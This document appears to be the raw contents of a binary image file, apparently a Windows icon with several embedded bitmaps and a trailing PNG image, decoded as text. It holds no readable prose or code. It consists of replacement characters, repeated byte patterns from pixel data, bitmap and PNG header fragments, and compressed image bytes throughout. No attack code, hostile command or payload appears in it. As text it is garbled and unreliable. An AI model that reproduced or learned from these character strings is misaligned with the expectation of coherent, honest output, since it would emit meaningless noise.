mmm���������������RRRaaa���������������333������������������������```~~~������������bbb���������������������������lll���������AAA������������������������������vvv��������������������������������������������󀀀��������������������������������������������􉉉��������������������������������������������ݓ�����������������������������������������������������������������������������������������ק�������������������������������������������ӳ�������������������������������������������Ľ�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������̃��GGG!!!&&&SSS������������������������������,,,


###MMM���������������������������^^^��������赵�uuu///???���������������������������������������������;;;___���������������������������������������������FFF���������������������������������������������OOO{{{������������������������������������������XXXddd������������������������������������������bbbkkk������������������������������������������kkk���������������������������������������������sss�����������������������������������������À����������������������������������������߻�������������������������������̽����������������������������������������������������Ǵ�����������������������������������������������������������������������������������������������������������������������������������������������������BBB���������������������������������������������			666������������������������������������������ccc"""���������������������������������������������CCC������������������������������������������qqq$$$���������������������������������������������,,,aaa������������������������������������������444BBB������������������������������������������<<<III��������Ͻ��������������������������������EEEqqq��������ܶ��������������������������������LLL�����������𽽽���������������������������YYYooo��������������ݬ�������������������ҡ��eeeggg��������������������٭��������������wwwooo��������������������������������ɪ�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������Ž��������������������������---�����������׳�����������������������������```���������������������������������������������JJJ������������������������������������������$$$������������������������������������������(((������������������������������������������   VVV��������ǌ�����������������������������www&&&�����������皚����������������������������111OOO��������������̃��www��������������Ć��<<<@@@��������������������Ȉ��kkkddd\\\TTTLLLEEE___��������������������������ᳳ����ggg```zzz�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������ۺ�������������������������������������������צ�������������������������������������������騨���������������������������������������������Ɛ�����������������������������������������������������������������������������������������������������������������������������������������������www���������������������������������������ooo������������������������������			EEE���������hhh���������������������������ggg������������|||___������������������������999���������������aaaTTT�����������빹�sss&&&���������������������lllIIIBBB;;;444---&&&FFF��������������������������ڢ��oooHHHBBBbbb�����������������������������������������������������������������������������������������������������������������������������������Ǳ����������������������������������������̙�������������������������������������������ǁ�������������������������������������������ᇇ�ttt������������������������������������������hhh���������������������������������������������```������������������������������������������dddXXX������������������������������������������]]]PPP������������������������������������������wwwIII���������������������������������������������BBB���������������������������������������������]]]:::���������������������������������������������???000www��������谰�bbb���������������������NNN'''!!!111��������������������������ӑ��VVV***&&&LLL��������������������������������������������������������������������������������������������������������������������������������߳��������������������������������������������yyydddlllvvv���������������������������������\\\YYY��������������ٽ�����������������������gggMMM�����������������������Ӯ�����������������BBB�����������������������������к�����������kkk;;;������������������������������������������BBB444������������������������������������������===---������������������������������������������]]]&&&���������������������������������������������!!!ooo������������������������������������������AAA���������������������������������������������"""eee������������������������������������������777��������������������������������������΄��DDD������������������������������������������������������������������������(                                  ������������������������������������������������������  �  ��  �  �  �  �  �  ��  �  ����������  �\i�\i�\i�<L�:I�8G�5E�4C�2B�\i�\i�\i�  �������  �\i�BG����;;����		�33����05�\i�  ��������\i����������;;���33����������\i��������  �O]�GG����������;;�99����������44�3C�  �������  �R_�((�GG�������������������44��5E�  �������  �Ub�,,�))�HH�������������::���8H�  �������  �Wd�00�--�KK�������������==���<K�  �������  �Zg�33�PP�������������������>>��?N�  �������  �[h�PP����������LL�JJ����������>>�BQ�  ��������\i����������RR�//�,,�KK����������\i��������  �\i�X[����RR�44�22�00�--�KK����HL�\i�  �������  �\i�\i�\i�\i�[h�Zg�Xe�Vc�Ta�\i�\i�\i�  ����������  �  ��  �  �  �  �  �  ��  �  �������������������������������������������������������(                                  � �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �"g�d��� �� �� �� �� �� �� �� �� �� �� �� �� �_����U��o��� �� �� �� �� �� �� �� �� �� �� �� �1q�f�ǝ��d��{��� �� �� �� �� �� �� �� �� �� �� �� �@{�v�Ϋ��u�̮��Ҧ�С|Ӧ�۲��Ϻ� �� �� �� �� �� �� �P�����Ǩ�ߺ��������������ɮ�ʰ� �� �� �� �� �� �� ����߻��������ֻ�ؽ�������з���� �� �� �� �� �� �Ҩ��������׻�ؽ�������������β� �� �� �� �� �� �Ӧ�����׽�پ����������������ί� �� �� �� �� �� �׫��������������������������ӵ� �� �� �� �� �� �߹����������������������������� �� �� �� �� �� ��Կ�ϵ���������������������� �� �� �� �� �� �� �� ��з�ս���������������� �� �� �� �� �� �� �� �� �� �� ��Ը�ӵ�ֹ���� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �(                                  � �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �7�]L�e� �� �� �� �� �� �� �� �� �� �� �� �� �7�^��I�b� �� �� �� �� �� �� �� �� �� �� �� �8�an߆t�H�b� �� �� �� �� �� �� �� �� �� �� �9�dp�/�Ss�/�R� �� �� �� �� �� �� �� �� �� �:�gu�6�[2�Xk�eσd͂êeˁeʁeɁD�f� �� �� �;�iz�>�e;�b;�b<�cA�gA�gA�gA�gA�gI�mdǁ� �� �<�m�G�oD�mD�mD�mD�mD�mD�mD�mD�mD�mL�sfʄ� �� �<�n��P�yL�wL�wL�wL�wL�wL�wL�wL�wL�wT�}ḣ� �� �� �=�o��W�T�T�U�Y�Y�Y�Y�Y�`�jϊ� �� �� �� �;�n��\�X녅�oےnّoؐoאo֐oՏJ�q� �� �� �� �� �;�m��\숏�2�[� �� �� �� �� �� �� �� �� �� �� �� �:�m���I�k� �� �� �� �� �� �� �� �� �� �� �� �� �9�l��O�s� �� �� �� �� �� �� �� �� �� �� �� �� �� �8�k[ȃ� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �(   �              ,                      ,��D	���"���������i�2                                                                                                                                                                                        ���-���ǆ��������������)                                  -   R%�D�	T�	U�A�#�   U   -                                      
                                                          1/                                                    9   F   A   8   $                                                                                   __ �?�__?�?�?�__ �?�__?�aa&?                                   	                                           7�� ���uȦa�m4��\4���j��+TZ�~L �xJ �h= w[4 "                ����{yy�����            ����������������������������                                    

&7>W}�a��V��2IZ                            ���W���������������������������W                           G#�|�2��@�� F�� F��E��D��'��&�   J                             @F  i�	��	��  i�  :M   0                               A�0/.�PPN�\\Y�GFB��2                                 O.�Kf+�a�S�<���	p��?J�m   -                                                           ��������?���������?������?�@@ �VV?                           $   ^   ^   ^   ^   ^   ^   ^   ^   ^   ^   ^   ^   ^   D   ?��7'���S�    *.)7l=�s �� �������ޕ ��k �{I �U2	*        ������������            ����������������������������                            
i��#���"��� ���������Z��                        ���W������������ň\��k7����������������W                     %]^2��?��E��
S��U��Z��^��[��R��I��$Vr                      7)����������������  #@                        �998�������������������������11.�g                       wR�5�z�E�yŢ�8���������������HV�   @          2e�C��C��C��C��C��C��C��C��C��C��C��C��2e�   �����?��� ���?���?����������?�@@ �@@ �RR?                    d�c�b�`�`�c�e�h�l�r�w�	}�������   E��C*���^�Ѭ�r |= ��x �� ������{���p���/������*��H �UC7N    ������������                    ����������������                sP�S6~3! M5" NiE���$`sn8���5���+���$���������                ������������|d�ȃN��S��{Y��xM��ye��������솆�             C�7:��B��k��z��x��z��{��s��k��p��r��W��C�]              ]	������ �� �� �� ������
��  ;M               xVWW������ݸ���u���X���a��ф���������998�Z               
(wc�;�c�+�z���7��������������� ���#���g{�5        I��s���o���o���o���o���o���o���o���o���o���o���s���I��    ��������?�������`` �?�?�   �@@ �@@ �                    p�o�n�k�g�h�l�q�t�x�{�	��
������   I��>C������MؕM �υ �ޘ ��� �� �ړ ���k���<�� �����> �M>: �����������������������������������������������������������������Z ~�j��v����Β�ԞC�HPEfe���e���S���7���%������%/%                ����������v��l6�Ȃ>����������{]��tL��{h���������         G�
=��A��x�����w��o��8��P��Q��	g��������d��Y��%l�        ��	��  �� �� �y         �p ��  ������   -        ,WXW󷸻�׿��حP��8��9��G��A���Q��ݭ�����""!�           >^�8�R��@��u���e���6���!��������������� ���Qa�       P��q���h���h���h���h���h���h���h���h���h���h���q���P��    ��������?��������� �@@ ��� ���?�   �@@ �                    ~�}�|�t�h�f�m�u�{�}�����
������   C��.U���$���Trb��? ��t �א ��U �;	,Z%wF w�����0���
����Z:$ٰ���������������������������������������������������������������U>5�q���̐�֠J�ްp��rS�e��ˌ���y���[���3���#���Nie            ���)���������pH��~@��x2����������|V�؆b��kB��������݆��"    @�Z7��a�����}��b��J��6��&��z9�1Av�'���������O��R��      �0��  ��  �� ��                ��  ��  ����  q�   
   ;;;���������ˋ%�԰s���S�۞6���~�ߩ?��U��D�����iko�			k       9Y%�`�0�@��K�C�W�Y�x���{���]���8������������"������<    S��t���k���k���k���k���k���k���k���k���k���k���t���S��    ��@���?�?���������?�@@ ������?�@@ �   �                    ����������������00��w���������	��
����   9��J���8������q:��N ��h �*                                ���������������������  �� ��  ��  �� �� �� �� �� ���������,�t�Æ�ҙ2�ܬi��Đ�̴��G}������z���L���0���"���v��            ���~��������ˋ]�ʄE��n+��j&��p.��~C�҅L��{Q��gJ����톆��    @��	H��������J��K��U��]��[��&���G�k9�������r�� J��    Ā��  �� �� ��                �� ��  ������   1uuuʫ�����[�Ǌ;�ƃ-�˹����r��{�ٰ\�ԪI�֚1�֬q�����!"!�    
(d�C�P�-�L�E�V�m�mӛ��ʩ�}�����������l������������"���KYy    U��w���m���m���m���m���m���m���m���m���m���m���w���U��    ��������?�@@ �@@ �@@ �__?��������@@ �@@ �;;RR?            ��������������������00������������	��
��       ;��Ys���&���8���\" ��R ��X ��L ��Q ��Q ��N ��B ��A ��= �3����������������������'��+���� ��)��P:��J1��P7��>���������    �h�Ǌ�՞D��y��ѣ��޺�J``WDdge<gS�Q�s�D�l�)gH�=/q        ��������Ι���|S�̓G��j&����������j+�͂B��~E��zW���������    G��l�����x��,��3��z<��J�#O��Cj���K��K�Gr��-������N��    ٿ  ��  �� �� ��                �� ��  ��  ��	��   Hstuড���}Q���X�ȗc�޼�������t\�խh�Ì4��x�ÈD�����GHH�    (6Ml�L�K�>�V�j�hΘ��ټ�dz\�MI0�Z@ �L?2�x���^���
������!���s��    W��y���p���p���p���2e��p���2e��p���p���p���p���y���W��    ����������?�@@ ��� ������ �   �@@ �@@ �__?����`` �LL ?        ����������BB����������y�������	��	��	��       ;��%t���U������EH5�c0 ��� ��� ��� ��� �� �� ������1����� �H�b����������?5��*���� ��I2��kZ��eM��lV��Z<���������    iH1�a�ʕ?��t��œ鞓}�-7=$n��ۋ���xѶ�\ã�>���8�g�/H        ��������ьt��wW��uH��a&����������d*�Ɂ7��}8��uC���������     G��������<����&��&���B��[��_��W��T�eVA�?���0���H��    	�  ��  �� �� ��                �� ��  ��  ����   %&&@bcdٝ����uN��e0��u6�ÓY��w_� M������٤q�ŇX�ʜv�����\\\�    ); Sg�R�P�W�]ƈ����z�v�eV$�ǂ�ߍ'��{"�SG4�e���$���	������{��    Y��|���r���r���r���2e��2e��2e��2e��r���r���r���|���Y��    ��b?��_���?�@@ ��߿������� �@@ ��� ���?���������?�;;�        ����������������������������23������	��	��       b�s&�}Ÿ�D������/4)�66
�A+�J4�H0��a��v���S��=�2�����HDC�{yy����������F=���� �� ��kX�؄t��}i�ރr��u^���������    
6E��9n�.@\e&Gnoz��!���\�������qβ�U���;���6�_�%R,�        ��������Ѐh��z^�݊j��rM����������Z&�ɀ4��{.��q4���������    >�����#���z��7���7���M���-��ڛ;�ʏ:��u.��f!�oF*�Q���9���N��    �������� ��                �� ��  ��  ����   \\\������}c���V���Y���o�ڹ������7M���uY�Ċb���������HII�    5B/:w�o�V�n�jС��޽�bnM��~,��L����R��{>�[���<���#���@���s��    Z��~���u���u���u���2e��2e��2e��2e��u���u���u���~���Z��        ��^?��_���?���?���?��� �__?�������?�@@ ����aa/�            ������������DD��������������45����������           �t���)�|���6������;^�;f1    jW:������/���W��=�'	����������������������-#���� �� �܏�ۙ��ܘ��ڞ��܏v���������         J��&o��)���)���(���+���5[Xkvе�bƧ�H���7�w�5�T�2s;�    ��������Ոp�؈o�䨑�᭚����������[*��p+��v2��k6���������    3�����#������q��)r��w���&���P��O�֘=��h$�mo]�T���1���X��    �������� ��                ����������       <<<_�����~u���u���v���l�е��œl�����|t����i�����ilm�'&&<    *{�|�bɉ�sԪ�����pqa���8���b��ȑ���^���L�_��V���CP��JY��_qS    \��q���m���c���Y���Y���i���i���Y���V���^���h���n���\��            ��b?��������������@�������``@�                    

��

��

��		��		��		������������DD������������           �z	\�����N�p���9��� ���#5K�QWU��(���@���[���Z��q8�M_<            ����������� ��# �� �Ӵ��խ��Գ��ҹ��֤����������        :�#]��'|��)���)���)���#Jcfa¤�L���:���6�d�4�E�4~5�+    ��������ܛw�ݓu�ߴ��鼭����������`-��}L��kA��X6���������    "��z��#���!���y��z��_��_��i��^�߲P��d&�s���X���w��e��    %%�P%%��##���� ��   #             ���������y        


���ţ����{q�ŧ��ͯ��Ҷ��̭��ٵ��������������OOO�            SzZs�ު��߻���������tcc�Ǔ_�ҏY��y9�����PO����	��?`��'&    ^�m����������������[���c���c���[�������������������^�m                                        ss;?        ��Z?_�BB�    

��

��

��

��

��

��

��66��������������������	��               �y ���0���\��ͺ�C���&���Gah���s���g���w��u4�bg%eKc�            ���������  �� �� �� �ۥ��ߗt���q��i��X���������        $^5G��#`��'v��(���(���#T��C�}�9�z�0~Z�,nE{(e2�+i'�"H-n    ������������Èu�דz�庪�䝅��{S�ɀT��m@��e8�������������    ��n�����#���������&��&��7���u�گU��a,�d���A���\��r�        44��33��11��	�� pf        �@��##��""�����               )���਩���~z�������������������������opp�            !���͸�������42��de��ki��gb��gh��bc����  ����+O�R        _�GQ��đ�����������e���m���m���e���������������Q���_�G                                    ��U�`` �uu@?��_?�ߟ������?�DD�����������

��

��

��88������������������               �B �y ���.���^��ؓ�u���M���Dpr�g�s��qH�        ���            ����������������������������������������������������        	01��A�� S��#^��$b��&W��*WM=D5                4%
    ���Z���ܐ�����������ĝ��ؐl��qH��kC����������������І��Z    �\_�����_��_�����-���ԉ��ӊ����ҢT��],�E���W��d�V            ??�0BB��AA��.,�� �� �� �� ��*(��33��11��--�`                    ((( ����������������������������zzz�                    9IC*�ȩ�rt������*+��56��!!��  ��  �����y            `�#-Υ������������m���u���u���m���������������-Υ`�#                                ��l��?����@@ �    �������`` �ooC?��������������

��

��

��		����������                       �z	\ȅ��!��3�Kֺ�:���G���V^�Ga�g��4��            ����������������������������������������������������            $�M)��1��7��8��-vA                                        ���'�����������������������������������&                _��_��_AS�vPF�_��3���ߞ��ߞ��ˆ���I��c%�RBY�O�;                    MM�0PP��OO��ED��*'��)&��@?��EE��CC��==�P                                UUUZ���ڴ����������uPPP*                                $@C��\\��%%��������--��55��{V                a�a�ha��a��a��L��L��L��L��a��a��a��a�ha�                                ��h?�ߟ����ffY�        ��i��^?    ����������������

��

��		��		��������                                           w��GD���,���)���)��G��$                                                                                                                                                    ���(���Ӑ����������І��                        _ڬ_�3    �f34gFO�[Rhיf3�f3�a/͐[+��Z+]                                YY�YY�`XX��WW��VV��TT��QQ�pNN�                                    ...(+++JFGG                                                    66p?||�vv��ww����kk�o4                                                                                                                ��a?��y�                        ��������������

��

��

��		��		��������   (                                  � �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �7�]L�e� �� �� �� �� �� �� �� �� �� �� �� �� �7�^��I�b� �� �� �� �� �� �� �� �� �� �� �� �8�an߆t�H�b� �� �� �� �� �� �� �� �� �� �� �9�dp�/�Ss�/�R� �� �� �� �� �� �� �� �� �� �:�gu�6�[2�Xk�eσd͂êeˁeʁeɁD�f� �� �� �;�iz�>�e;�b;�b<�cA�gA�gA�gA�gA�gI�mdǁ� �� �<�m�G�oD�mD�mD�mD�mD�mD�mD�mD�mD�mL�sfʄ� �� �<�n��P�yL�wL�wL�wL�wL�wL�wL�wL�wL�wT�}ḣ� �� �� �=�o��W�T�T�U�Y�Y�Y�Y�Y�`�jϊ� �� �� �� �;�n��\�X녅�oےnّoؐoאo֐oՏJ�q� �� �� �� �� �;�m��\숏�2�[� �� �� �� �� �� �� �� �� �� �� �� �:�m���I�k� �� �� �� �� �� �� �� �� �� �� �� �� �9�l��O�s� �� �� �� �� �� �� �� �� �� �� �� �� �� �8�k[ȃ� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �(                                  ������������������������������������������������������  �  ��  �  �  �  �  �  ��  �  ����������  �\i�\i�\i�<L�:I�8G�5E�4C�2B�\i�\i�\i�  �������  �\i�BG����;;����		�33����05�\i�  ��������\i����������;;���33����������\i��������  �O]�GG����������;;�99����������44�3C�  �������  �R_�((�GG�������������������44��5E�  �������  �Ub�,,�))�HH�������������::���8H�  �������  �Wd�00�--�KK�������������==���<K�  �������  �Zg�33�PP�������������������>>��?N�  �������  �[h�PP����������LL�JJ����������>>�BQ�  ��������\i����������RR�//�,,�KK����������\i��������  �\i�X[����RR�44�22�00�--�KK����HL�\i�  �������  �\i�\i�\i�\i�[h�Zg�Xe�Vc�Ta�\i�\i�\i�  ����������  �  ��  �  �  �  �  �  ��  �  �������������������������������������������������������(                                  � �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �"g�d��� �� �� �� �� �� �� �� �� �� �� �� �� �_����U��o��� �� �� �� �� �� �� �� �� �� �� �� �1q�f�ǝ��d��{��� �� �� �� �� �� �� �� �� �� �� �� �@{�v�Ϋ��u�̮��Ҧ�С|Ӧ�۲��Ϻ� �� �� �� �� �� �� �P�����Ǩ�ߺ��������������ɮ�ʰ� �� �� �� �� �� �� ����߻��������ֻ�ؽ�������з���� �� �� �� �� �� �Ҩ��������׻�ؽ�������������β� �� �� �� �� �� �Ӧ�����׽�پ����������������ί� �� �� �� �� �� �׫��������������������������ӵ� �� �� �� �� �� �߹����������������������������� �� �� �� �� �� ��Կ�ϵ���������������������� �� �� �� �� �� �� �� ��з�ս���������������� �� �� �� �� �� �� �� �� �� �� ��Ը�ӵ�ֹ���� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �(       @                              W2& YB6 u_= &t 5Dr QCD OOi `ek ytl qi~ �Q �] �[ �t �c �h �f �k �p �w �| �d0 �y> �|" �w( �s2 �{6 �}8 �mJ �|A �|P ��' ��? ; ��R ��a ��n ��x ��{ ÂA L ÊK ɔ] ˙f ʞk Ξq ͦ} ѣy #�  &� !,� !7� "<� 30� 63� 85� =<� � !� "� %� 2/� $3� <;� ;7� >?� '"� )$� &!� % � (#� )$� *$� 4/� ?;� <8� 68� @>� @=� ?G� &H� 'Q� =@� ?A� +W� +^� ,_� ,`� -b� /g� 0f� BA� MK� NL� RP� UT� YW� ]\� LK� VT� Tg� Qh� Zm� ^z� u{� vu� nl� |{� zy� rq� zz� NJ� @C� a^� [}� Q|� Ct� Nv� Kt� ^p� P}� ge� ml� qo� fd� dx� qp� %� %� % � % � *=� 72� 7J� =S� 0k� 2p� 4v� :y� >y� 5z� 8v� ;{� 8}� FG� CI� JL� KP� HP� NX� TV� QU� XW� SZ� [[� S`� _d� Vr� D`� D� ed� ii� gf� ci� co� nn� as� ls� jy� g~� rq� u� ~� A~� V� �� l�� t�� K�� ]�� W�� 8�� =�� :�� :�� ;�� =�� =�� R�� D�� F�� G�� D�� A�� l�� p�� s�� z�� B�� C�� H�� B�� F�� K�� B�� H�� K�� A�� J�� E�� e�� m�� P�� @�� N�� Q�� X�� W�� X�� U�� X�� [�� a�� m�� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� թ� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���                                            �����������                   �nODF������F>_�                zG�������������C^              A�����������������7            J�������������������7          K����������=����������\        |��������<14:���������Fj       F�����<25RWW[dG��������8      }���<3QY�ZYYW��i ��������F�     G<?U�����������u  ��������a     ����������������e ������=K     󐻻������������ǌ  ��Fp�       ����������������Πf r           �������������Ǐ��s�            �������׺�Ώ��vtt��	           ���ê����½wgy�ֵ��           ��������hs��̲$-          �����������&%* ,          ����������'�.+"           ���������b /0,*�k            ��������@      -P�S9_m       ���������_      #x�ŧ�M�     ����������^     �!~���T       ����������qNccB��)(�ŧ{       ������������������
��S         ��������������������ŕ           ������������������Ŗ�            ����������������Ò                ������������                   񦛘�������                                          ��������� ��  �  ?�  �  �  �  � � � � � �� �� �� ��  ��  �� ����������  �  �  �  �  �� ��������(                                     yT7 mVP �l �o �  �v) �u2 �~1 �jG �xW ��Y ��h ēb $�   � #&� ?;� %-� -(� )$� (D� )V� ,_� :i� MJ� _a� Xz� [v� lm� nl� TP� WT� SP� ]f� mm� om� is� `r� rs� `g� %� %� &!� % � *$� /[� 6|� AK� ^n� E|� Qz� al� `q� fr� gr� fz� b|� i~� i�� M�� Z�� ?�� 9�� I�� P�� C�� B�� G�� {�� n�� w�� ~�� v�� {�� ~�� C�� F�� L�� N�� _�� J�� I�� z�� O�� L�� X�� T�� U�� X�� ��� ��� ��� ��� ��� ��� ��� £� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ���                      +*+*        ++++++++     $*+**+*+    +#-+++  _./??DON_*+*   9UWYWTQMBZ!     03VQQLB2<      7KSPA@=;
	     Gpmk&\     eqpm( a]^     qqpf   F9'   Htqoh4"1[%5     gtqokiKIE:       djqpokK5q        oocboo     ��  �  �  �  �  �  �  �  �  �  �  ��  �  �  �  �  �PNG

   IHDR         \r�f    IDATx��w�ei]&��;�|n��CWUW��T�v3��шdTD@AD���q�ttf�|K�5�֬12(�HR�D�Mj�cu��n�'����������{��V꾿Z��>�~��g?�/�a��*��*��*��*��*��*��*��*��*��*��*���v�;�*W_�e�N �`.p	p@�'\ �c��0�1(~�� �<|���5�ʥ�*�H����$��ep*��߼#�77�u��q*6��������Gs\c2dp �E��� 0U��� �[S�,1G�%�1��T3U��S-����rl7'K�>]ow��!�s"�9��9q"p�~��gV��:�U��^�ȶ�mrQ��l{'���T�w�vn&ۭr�tIW��q'�S�\�����DD���{dFL��ɒ�$��5mf>���
3]�-�*ÇQ*�=z����[��mNL��T���B\���E����V	�*�*\g�׾Vf���r�ݓ�w+���g���}��f�٭r�� RA`���oE`9�@`�s�l^�M��η֬�^7��]0�'�3�Ěv{j�c,��̉�@�@��2����)R��?���w���e�*\c��{ޫRsn����Nο��M���6�3Gxϑ�d�W� �)����/�c��Nuڏ=Q�?mJ�7�,����
��*�1T�c��\��}�%mdX�m۹��\%�ːU�����b��v�#�7����c/��^����5���uB Y�d�Y57u����i��-=�_�������ݷ��9�Y\4��9�5M�F�^���>�J!�p��;��)]�I{��Ы[����ݮ��m�֒å+
@��_�y��)'C�i`� �T���
�g`�s��r	�0A�wm���2�-G.��Y^1���i���eϷݭ;���ź����놮��1�`->��m�2Ǉ�_Z�^Z�J W@������W˥�;z��ޙ�5p��K& �%r� �\�2��R.A-��V���:�r��C��!
`L��ڠq�}�x:��v��t9�Fn��ׅ�6�,��6�nN�Okp{]�]��.�rP��߳��޽��n��=�2r@�q�k�,�^��N۵��w~{�*�#��B�О=9y�p������ro"�+�� ��il}��k�B_7mt��(�B��A�u0�8H}��)�8x��DD��"��0��?�铃��@��4�Mn׀U��Z�Üm����5�&�F�e(kB�X���n߶��k7?*K��$`�Z��;똮������*$d� .C޿�I9e\�Ǹ��mY;����$F 
�>>���	6�Gn�$��Q�c`��
f|&�t�|@^"�A�kv���v����7�&֛�*�㐵Xc�l��S5X�u8��%�l�4��}�Í=�|�;��.��]gqѤ��K��Ɵ��*��J � ￵�߱������]�g�/�)�A_;L�m[Xq�6m�R.A���W��QA� ?<��	y�&���5�3�#��f�G��a��ST֯�$A����z��3螞F��ܖr.�J���8����ݟ��xĄ4G�chD[�������G>�7/i2X%����nٳAR����?ඬ͸��� }�0�;���k;��7A� T�Ҿ^"���@Q�p�	p�*f�O�zm�M剗����c�n�o�d����]��z���=9�ޅy�e�ʹ���?uvݦ0����]t;�T[��N��џ���_�D�J Kȃ�v�rN��4����d�a,�I9��޾��{���@ִ�<yv�_		��# ��1�� ���4�����?��������X�2�&�� �p{&�g/�}�,�'g�v���+�����~��ؚ�4�z�u�^oq�(��嘆�&N�z����� y�[��ܶ�F����
���0t�nTo�}r�g�#�@�	a�����@�$�Ep��Ƞ6�x�p(�/K����n?��������{n��O�sb
d�X��Jn��֍�����{�,�k7f�ղH���������*$��]�%I��2I�=�e�09<�d!�A�����c�ۑ$�v�L���M�Z%�O�@�Q���N����D{i�_h_�Go�= � (��>�O�C��ܞ���h>{�t�[�8X�*L?�q�_<��?����w���U�a���?=���5�J �<r�����-���⥥�3MF��]��(��Yρ�ǁ��p>8�HjS?-��Y��3½4"�t��2YĒ~���� �yTM0��O�7@<}�%�Eoj�g��}�<��̉���P�<���?z�p�B���c[R��\�?����"� ����3���۶~�ne���x#������B��1� 
�yZS����`�$#�1��B�50��� �D�_�?��H8:������aH��O�=I8)�����s:]Ԟ<�֡3p[&�"Ò��SkG��I�S�s±�b���m�6'��cG_�n�K� ڽ���n�u������Xb__?���݋��C�TS �4m��M��`��G�Qp��-0�> X I+!q�PYe���V�d���}�����K�W��� ��E��	4�:AȘ�Eݒ6�`���.v�b[V��[�$+ǘ�%Ο<y�Ee�d	�����,���s���M��|�0r�.o}�9L��o�M,8 P�' ��~����U�� b��W����ٚ�|�#�81�qȌ��ϼ�{EBR�x�����G�<x�_��g&���ɱ�|�����:��FIb��'O�h���<�k�*����_ܮ=1h*��fk�|?��r>� �k~�,���%���ejd�3l�KJO�	��+pA���a�?������ȿt���kO�O_���L�a�H�f��?������a�ZC�S�:��L��M��V3Ɯ?x�Ʒ�k݁�)��{��H���_%��e�:R��w����Pں�����2�34�ωh-d���� �'��fk�4��l���*��'K�z��b߼,��(D��l����-�3���i(m]���X�s�F�R��3|'co(��ّ�y���� 1��z=��#/	��]�d����i���L>�'M@�){�]X����FF�
�@�B H?��OA�?��QI�'m�'�C����d��B�'�k��L��K��κ'bP�7���  �4��]Gt�D��O���1p#�b  1~t��տ����B�<�%݊�,p���]�=<�wO��ԏ�s�����#@�X��ף�eRFAJ{�|���N�)�A�/��#$�~}AtQ��(@���YGR�Q���i����g&�`�'޿~��X�#`.60��30���O����f��s�k>��]d�d��#�GO�J�׹��]�G�u\��f���k��%��=o��w�	��h��0X�y�c�HCJ+{���*N՗eچ]��Y���h>~��>��pO2 }�*E�/O�ǇI�/	2�Ϥ��( %�Ci�zH�c�p!�/9��SW�M�Z<{�k���Wh�:��ƍ��(	�=��OoZ��k����Ȳt0t�n��o�Ǫ{v���dK�~>�4�Y�H �׀��$�<��5� K[Ǿ�I%I i &�%6�1���N,���`��Zb?�'#-v���^1P��_;}�cf1�%Pm^��p�Y��Nv�s ��j�Gt#���� ڳ[���o�5㿓�3��*CElx�o�Z.��!�!D�y���������!����Z9�\?�/�Tl�2��@�q!=AXYZ?KS{�X�{.Z�s	 ��G}-��d�+E�����؀���H�v9t�5z��O  ����F"�<tǾ�$K�,�~�\�܍��c=����Qٻ;��� ��c�H�+���?-�u� ���Ӹ	�۫$��Q?x��" #����j�~B�u�3�AA�9�/���O$UA馵��s�'x ���N��tJ�{�rO� '0� 444D�7 	�h���o� i����[H,!�*��׿�m��O2md���DD�v�������Ҍ�b������i�z��&P��ߦ�'h����@����A��N�H�c$�%��W��;����I]��� /¾�B����a�������>�������7�'\G���?�eV�0ɤ��E�i�K��ռvԴ��[+�p���^��������B�nd��rQ����kxmjL��8<� ISZH�4��;�75
��OG�����1�]$�E�|B����Q�)s?��Q���mSrD��2���I�pQ�~�MIc�'����=3�
2���淲�3���_��\�c�3	���ȝ��I��%�aޜu^�0������ٓi�aD?.%����I�JK��Is��d�T�Dݑ�o7j��IX��2	(Vo���O�\���!b�)7k �D�"�I�_�,gWb���*��C蝙ى}l��ކ�Ύ�q ��}��I��&������`;_r�Ɔ��[�bۿ?r�Q"�}�D��`FLf�/S�	y��%��'"�k#�m�)RA�kx��L�]��~�d�E�`�mef��a��b���!?-sx�Y/C.f[r�\������>$���*�O��s�-p^L�v��K ��u�˨g~�m�kR'0r�m����A-q;��a�M8�EY��X�@��HA�d�.Y}Ͱ�2����&�p!�`�8�Gp	P�!��!oP � s?�}�4�G �G�#螚I� �$�⸭5\�;�5��eݽ^I��$�'~�Wo�9�%�mM�N2�����w�3�/C�9��{�_�@�=��=����~�'��&��v�y�whO�.����Gך�14f�?�d@�b$�}�ȤA\�\ʋI�b��:�f@N�\�� ���W��L�oo"� .|�:#�� ��O��>w��س������[�Æw���d�?�@�
+~.���4%ڎ�âq��
uƀ���SVJ�]�L��Rē�;�D�x��5���X_�@�4�)iA�<�t��7����
:'�Rۏ)6��jʾ�2;�v�<K��2�p���E _������_�.,nO��%�}��X��7,kV�e9@�7���W��ٝO���G@�yd*e�g��"� 0�!1�i1�����O	�! �x"�b�2���ʥ ��p�S�с��v�=���.� 8 ��I�F}e/��!����I2{�`϶oO��ֿ��y��[t �R�'���|)-��`��^R��uSH,�� nXu��`�a�G�Ni �}�f�����~PW��'�եq-?`e�r  ԡ2��@B�={l��~ư�O �Y��
